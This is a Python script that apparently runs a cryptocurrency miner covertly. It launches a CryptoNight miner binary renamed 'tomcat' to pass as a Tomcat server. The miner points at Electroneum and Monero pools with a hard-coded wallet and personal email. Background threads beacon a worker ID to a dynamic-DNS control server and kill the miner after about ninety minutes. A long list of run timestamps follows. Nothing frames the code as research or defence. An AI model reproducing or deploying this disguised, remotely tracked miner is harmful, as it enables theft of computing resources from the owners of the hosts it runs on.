import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:12:02.242274
#2018-02-17 16:58:06.790336
#2018-02-17 18:48:05.548627
#2018-02-17 20:37:06.144251
#2018-02-17 22:23:07.421918
#2018-02-18 00:07:05.927301
#2018-02-18 01:57:06.037276
#2018-02-18 03:45:08.784252
#2018-02-18 05:31:01.458080
#2018-02-18 07:23:05.870730
#2018-02-18 09:11:04.049742
#2018-02-18 10:57:04.460065
#2018-02-18 12:44:05.864966
#2018-02-18 14:31:06.363260
#2018-02-18 16:21:05.383828
#2018-02-18 18:10:03.905705
#2018-02-18 19:56:06.423283
#2018-02-18 21:44:03.911410
#2018-02-18 23:33:05.921863
#2018-02-19 01:19:04.217915
#2018-02-19 03:07:05.545480
#2018-02-19 04:52:01.921285
#2018-02-19 06:36:06.444688
#2018-02-19 08:26:05.029625
#2018-02-19 10:15:09.407010
#2018-02-19 12:05:08.695409
#2018-02-19 13:52:06.889510
#2018-02-19 15:40:13.146123
#2018-02-19 17:27:09.274133
#2018-02-19 19:16:07.132387
#2018-02-19 21:03:02.115070
#2018-02-19 22:49:05.340909
#2018-02-20 00:34:06.504774
#2018-02-20 02:23:05.201610
#2018-02-20 04:14:01.798348
#2018-02-20 05:57:06.822372
#2018-02-20 07:43:05.667819
#2018-02-20 09:28:02.092125
#2018-02-20 11:12:09.051675
#2018-02-20 12:59:02.223032
#2018-02-20 14:43:07.404600
#2018-02-20 16:28:08.983388
#2018-02-20 18:17:10.683491
#2018-02-20 20:08:07.467812
#2018-02-20 21:56:07.599164
#2018-02-20 23:38:06.827432
#2018-02-21 01:22:08.217902
#2018-02-21 03:58:05.012012
#2018-02-21 05:47:03.940722
#2018-02-21 07:35:07.944824
#2018-02-21 09:20:08.201263
#2018-02-21 11:09:07.391082
#2018-02-21 12:58:07.887429
#2018-02-21 14:46:02.306281
#2018-02-21 16:34:07.999467
#2018-02-21 18:25:07.263956
#2018-02-21 20:10:04.378955
#2018-02-21 21:58:07.257779
#2018-02-21 23:47:07.832043
#2018-02-22 01:33:04.928168
#2018-02-22 03:21:07.011631
#2018-02-22 05:08:07.136808
#2018-02-22 06:52:05.962359
#2018-02-22 08:41:04.847070
#2018-02-22 10:28:01.618552
#2018-02-22 12:16:07.357357
#2018-02-22 14:02:12.542099
#2018-02-22 15:49:14.465352
#2018-02-22 17:36:01.558618
#2018-02-22 19:22:06.300107
#2018-02-22 21:15:10.604870
#2018-02-22 22:59:07.614641
#2018-02-23 00:46:06.485824
#2018-02-23 02:34:05.910803
#2018-02-23 04:23:05.571675
#2018-02-23 06:10:07.368590
#2018-02-23 07:57:06.583061
#2018-02-23 10:13:01.463165
#2018-02-23 12:07:02.214709
#2018-02-23 13:56:01.275310
#2018-02-23 15:47:07.599150
#2018-02-23 17:33:04.964315
#2018-02-23 19:20:08.637642
#2018-02-23 21:05:01.404544
#2018-02-23 22:50:10.320397
#2018-02-24 00:39:01.875606
#2018-02-24 02:29:05.369128
#2018-02-24 04:20:01.320792
#2018-02-24 06:07:04.340359
#2018-02-24 07:54:06.036129
#2018-02-24 09:38:01.879234
#2018-02-24 11:33:01.951561
#2018-02-24 13:23:06.400396
#2018-02-24 15:12:01.865305
#2018-02-24 17:01:05.245986
#2018-02-24 18:49:04.326047
#2018-02-24 20:40:06.808036
#2018-02-24 22:47:06.264700
#2018-02-25 02:08:07.057192
#2018-02-25 05:51:01.777131
#2018-02-25 11:37:02.407758